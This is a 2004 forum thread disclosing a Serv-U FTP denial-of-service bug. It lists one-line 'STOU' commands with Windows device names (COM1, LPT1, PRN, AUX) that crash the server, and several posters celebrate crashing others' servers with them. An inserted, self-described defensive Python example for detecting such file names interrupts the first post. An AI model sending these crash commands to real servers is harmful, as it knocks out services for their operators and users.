easternerd
Serv-U up to 5.2 Denial of Service [eXploit]



Serv-U FTP server is a secure, advanced FTP server for Windows. However, like most programs, it is not completely bug-free.

I (and maybe more people with me) found this bug some time ago.
It can be triggered as *every* user that can log in, anonymous included,
and exists in possibly every version. (At least 4.x and 5.x series)

The exploit might be a cliché but it might threaten (hosting and other)
companies that use this FTP server.

The following commands will trigger the crash:

STOU COM1
STOU LPT1
STOU PRN
STOU AUX

However, "STOU NUL" does NOT work.
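The four names in the post (COM1, LPT1, PRN, AUX) are reserved MS-DOS device names: on Windows, opening any of them as a file talks to the device rather than the filesystem, and that holds even when an extension is appended (COM1.txt) or the name sits at the end of a path. The example below is added here and is not code from the original post or from Serv-U; it shows the server-side check a file-upload handler should apply before touching the filesystem, and a scanner that flags such arguments in FTP command logs. NUL is included in the reserved set even though the post reports that "STOU NUL" does not crash the server, since it is still a device name. The log lines are constructed for the example and do not follow Serv-U's real log format; `check_store_target` and `find_device_name_commands` are illustrative names, not a real API.

```python
import re

# Reserved MS-DOS device names. Windows resolves these to devices regardless of
# directory, and also ignores a trailing extension ("COM1.txt") and trailing
# dots, spaces or a colon ("COM1:", "AUX."). Assumption: COM/LPT 1-9 only, as
# documented for classic Win32 path handling.
RESERVED_DEVICE_NAMES = frozenset(
    ["CON", "PRN", "AUX", "NUL"]
    + [f"COM{i}" for i in range(1, 10)]
    + [f"LPT{i}" for i in range(1, 10)]
)


def is_reserved_device_name(filename: str) -> bool:
    """True if the last path component of filename names a Windows device."""
    leaf = re.split(r"[\\/]", filename)[-1]      # strip any directory part
    leaf = leaf.rstrip(". :")                    # Windows drops these when resolving
    stem = leaf.split(".", 1)[0].upper()         # "com1.txt" -> "COM1"
    return stem in RESERVED_DEVICE_NAMES


def check_store_target(filename: str) -> str:
    """Reply an FTP server should send for STOU/STOR before opening the target.

    Illustrative handler, not Serv-U's own code: a device name is refused with a
    permanent 553 reply instead of being handed to CreateFile.
    """
    if is_reserved_device_name(filename):
        return "553 Requested action not taken: file name not allowed."
    return "150 Opening data connection."


# Constructed sample FTP command log (hypothetical format, not Serv-U output).
SAMPLE_LOG = """\
[1] Mon 13Sep04 10:01:02 - (000045) USER anonymous
[1] Mon 13Sep04 10:01:03 - (000045) PASS guest@example.org
[1] Mon 13Sep04 10:01:05 - (000045) CWD /incoming
[1] Mon 13Sep04 10:01:07 - (000045) STOU COM1
[2] Mon 13Sep04 10:02:11 - (000046) STOR report.txt
[2] Mon 13Sep04 10:02:14 - (000046) STOR AUX.txt
[3] Mon 13Sep04 10:03:00 - (000047) RETR LPT1
[3] Mon 13Sep04 10:03:30 - (000047) STOU NUL
"""

# Commands whose argument is a file name the server will open.
FILE_COMMANDS = {"STOU", "STOR", "APPE", "RETR", "RNTO", "MKD", "DELE"}

# "(session) CMD arg" at the end of each line of the constructed format above.
LINE_RE = re.compile(r"\((?P<session>\d+)\)\s+(?P<cmd>[A-Z]{3,4})(?:\s+(?P<arg>.*))?$")


def find_device_name_commands(log_text: str) -> list[tuple[str, str, str]]:
    """Return (session, command, argument) for file commands aimed at a device name."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or m.group("cmd") not in FILE_COMMANDS or not m.group("arg"):
            continue
        arg = m.group("arg").strip()
        if is_reserved_device_name(arg):
            hits.append((m.group("session"), m.group("cmd"), arg))
    return hits


if __name__ == "__main__":
    for session, cmd, arg in find_device_name_commands(SAMPLE_LOG):
        print(f"session {session}: {cmd} {arg} -> {check_store_target(arg)}")
```

The check is applied to the leaf name only, because a path such as /incoming/COM1 still reaches the device on Windows; the scanner deliberately covers RETR and the other file commands as well, since the post only reports STOU but any command that opens the named target is worth watching.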
MxMx
omg omg omg sad.gif

all the lamers will raise and kill our ftp servers unsure.gif
THoRaX
QUOTE (MxMx @ Sep 12 2004, 06:30 PM)
omg omg omg sad.gif

all the lamers will raise and kill our ftp servers unsure.gif

won't work on users that can only download..

550 permission denied

so no big deal..
MxMx
not true ..

it worked on my local servu .. I've tried it with anonymous access .. it still killed my servu version 5.2 ph34r.gif
THoRaX
QUOTE (MxMx @ Sep 12 2004, 06:36 PM)
not true ..

it worked on my local servu .. I've tried it with anonymous access .. it still killed my servu version 5.2 ph34r.gif

holy cow, tried it on another server, and works ohmy.gif
could be horrible blink.gif
MxMx
told you ..

this damn simple mfing command is going to destroy the fxp world for now I think dry.gif
MxMx
It's best to delete this topic immediately I think ..
It's good that you found this bug .. but a disaster for stro builders and although this isn't a hack forum.. all of us know that this place is filled with stro building kiddies .. sad.gif
Axl
h3h3h3

finally somebody published it, I've been messing around with it - crashing fxp dumps and stuff since 2.5 was released...

nice bug...

there are more ways to crash serv-u, dig into the user manual and you are bound to find more.

F*ck the fxp scene ! f*ck lame fxp kiddies !DIEEE !!
mathofaka
h4h4 this is gonna be interesting blink.gif
Axl
h5h5h5

yes indeed tongue.gif
BuzzDee
h6h6h6 (sry that one had to be =) nice bug easternend biggrin.gif
101
QUOTE (MxMx @ Sep 12 2004, 06:47 PM)
It's best to delete this topic immediately I think ..


Original advisory:

CODE

http://www.SecurityTracker.com/alerts/2004/Sep/1011219.html


you should delete this website then ... laughing out loud
MxMx
QUOTE (101 @ Sep 12 2004, 08:36 PM)
QUOTE (MxMx @ Sep 12 2004, 06:47 PM)
It's best to delete this topic immediately I think ..


Original advisory:

CODE

http://www.SecurityTracker.com/alerts/2004/Sep/1011219.html


you should delete this website then ... laughing out loud

omg blink.gif cool.gif
night^man
crazy bug tongue.gif
Ecko
coded an exploit wink.gif

kidz stop lame fxp shit...

CODE

- look @ file download


add it in a txt file with name Serv-U.pl

have fun tongue.gif
BuzzDee
even every lame fxp kiddie should know how to "patch" this oh-so-damn-dangerous bug.

just hex edit ur servu.exe wink.gif

look - i replaced the T with an M in the exe of my homeftp:

CODE

STOU AUX
500 'STOU': Command not understood.
STOU COM1
500 'STOU': Command not understood.
SMOU COM1
Connection lost: 127.0.0.1


so nobody will DoS my homie and your 1337 haXXor Str0s will keep working, too...

greetz ph34r.gif
nackas
Ahh nice BuzzDee, was trying to think of a fix for the problem..
*goes off to do some hex editing happy.gif*
dont-staY
Rhinosoft should make an update for Serv-U as fast as possible or they will lose many customers, I think dry.gif

Really crazy bug ...
Hellraiseruk
we need serv-u to bring a patch out or something.. any other way to stop this rather than hex editing?
101
QUOTE (Hellraiseruk @ Sep 13 2004, 11:51 AM)
we need serv-u to bring a patch out or something.. any other way to stop this rather than hex editing?
Hellraiseruk
I don't have a "ServuEvent.dll" or does he mean the .ini?